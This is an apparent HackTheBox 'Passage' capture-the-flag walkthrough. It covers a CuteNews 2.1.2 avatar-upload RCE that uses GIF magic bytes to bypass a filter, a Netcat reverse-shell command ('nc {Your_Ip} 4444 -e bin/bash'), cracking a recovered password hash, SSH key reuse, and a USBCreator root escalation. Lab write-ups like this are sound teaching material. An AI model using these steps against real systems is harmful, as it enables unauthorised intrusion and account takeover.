HackTheBox: (“Passage”) — Walkthrough
Hi People :D
Today we’ll solve “Passage” machine from HackTheBox, let’s get started
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.206
We have two open ports (22/80) so let’s see the website on port 80
Web Enumeration
— — — — — — — —
After going to the website, you will see something like news articles
The next step is to run any directory brute-force tool, but when you run any fuzzing tool you will be banned from the website. I didn’t know why until I had read the first article. Which it is mentioned that the website has implemented Fail2Ban protection, it’s an Intrusion detection system (IDS) framework that protects computer servers from brute-force attacks
So we must dig deeper into the main page to find any useful information, scroll down a bit and you will find that the website powered by CuteNews
If you don’t know what CuteNews is, it’s an open-source news management system with some security features.
That’s all we found on the website, now let’s search for any public exploit
The Fifth link is an explanation for 'avatar' RCE vulnerability and the writer of this article made a script to exploit this vulnerability automatically ( First Link ), I’ll explain exploiting this vulnerability manually and then automatically
Exploitation
— — — — — —
[*] Manual exploitation :
As mentioned in our reference, this exploit only works on CuteNews 2.1.2 version so we must find CuteNews Directory exist to know the version .. and it is :D
Nice, it is the correct version, let’s continue with our exploitation process, first create an account then the website will automatically redirect you to the index page
Click on Personal options, you will be redirected to the account options
from here we can upload an account avatar but first we need to create a PHP script that executes a system command. This simple script can do the job
Note that only the second line is our code, but this service is only accepted for uploading images and it validates the magic bytes of the uploaded file. ( If you don’t know what the magic bytes are, simply they’re the first bits of a file which uniquely identify the type of file, you can find a list of almost all of the magic bytes for the different extensions here )
If you try to upload the code file without any image magic bytes, the website will not upload it because it is not an image, to bypass this filter, we need to add any image magic bytes at the beginning of the file, that’s why I added GIF8 ( followed by a semicolon to end the line )
As you can see in the upper image, when we run file command it tells us that the file is a GIF image
Now we successfully made a script so let’s upload it
We uploaded our payload, next go to the uploads directory, you will find the uploaded file in this format : avatar_{User_Name}_{filename.php}
We need to pass cmd parameter followed by our command, I tested the script with whoami command and it worked ☺
The last step is to get a shell, simply set Netcat listener with nc -lvp 4444 command then pass a Netcat reverse shell payload to cmd parameter, I used this payload :
nc {Your_Ip} 4444 -e bin/bash
We got a www-data shell with manual exploitation
[*] Automated exploitation :
Download this script and give it execution permission then pass the machine link to it
As simple as that, we got a www-data shell with only one step.
Note that with this script we found SHA-256 Hashed passwords ( we’ll use this later )
User Flag
— — — — —
If you used the manual exploit, Make some improvements to your shell with :
python3 -c 'import pty; pty.spawn("/bin/bash")'export TERM=linux
then do ls -la command to show files, you’ll find users directory inside cdata directory, the full path is /var/www/html/CuteNews/cdata/users, in this directory, there are some PHP files with base64 encoded strings, I checked these files manually and found some files with big data size so I decided to decode the first file with big encoded string ( 7a file )
After decoding this data with this website, I found some PHP serialized object data and there is a pass with some encrypted data again
Use CrackStation to crack this encrypted string but unfortunately, CrackStation failed to crack it ☹.
So, I went back to the files search process to find another encoded data.
Finally, I found the data that I was looking for in b0 file
Decrypt this data, we found another encrypted password
Stop here for a moment, do you remember the users SHA-256 hashed data that we found in the results of the automated script? It’s the same hashed data that we found in these files !
Now try to crack this hash with CrackStation again and this time the website successfully crack our hash and the password is atlanta1 ☺
Try this password with paul user, we successfully switch to it
You’ll find user.txt in the home directory, read it and you got a user flag
So you can get user flag with two steps only :
- Run automated script
- Try to crack the hashes from script results, you’ll find paul password, use it to switch to paul then read user.txt
Root Flag
— — — — —
When you do ls -la command in paul directory, you’ll find .ssh directory that contains SSH private key for nadav user
Just copy this private key into text file then change the permissions of this file with chmod 600 your_filename to be able to use it for SSH connection
ssh nadav@10.10.10.206 -i your_filename
Nice, we SSHed nadav :D
There is a file named .viminfo, in this file it is mentioned that the system uses ubuntu USBCreator
So i searched for privilege escalation exploit for USBCreator and I found this article
As the exploitation says, we can overwrite any file as root with the command in the upper image
So, let’s make a SSH key and overwrite the root SSH key with our key to connect via SSH as root, you can create a SSH key with this command :
ssh-keygen -t rsa 
Copy this key and paste it in nadav authorized_keys with this command :
echo “{Your_Key}” > ~/authorized_keysThen run exploit command to overwrite root SSH key with our key
Connect with SSH :
ssh root@10.10.10.206
We successfully SSHed root and got root flag ☺
Thanks for your reading and I hope this writeup was useful ❤
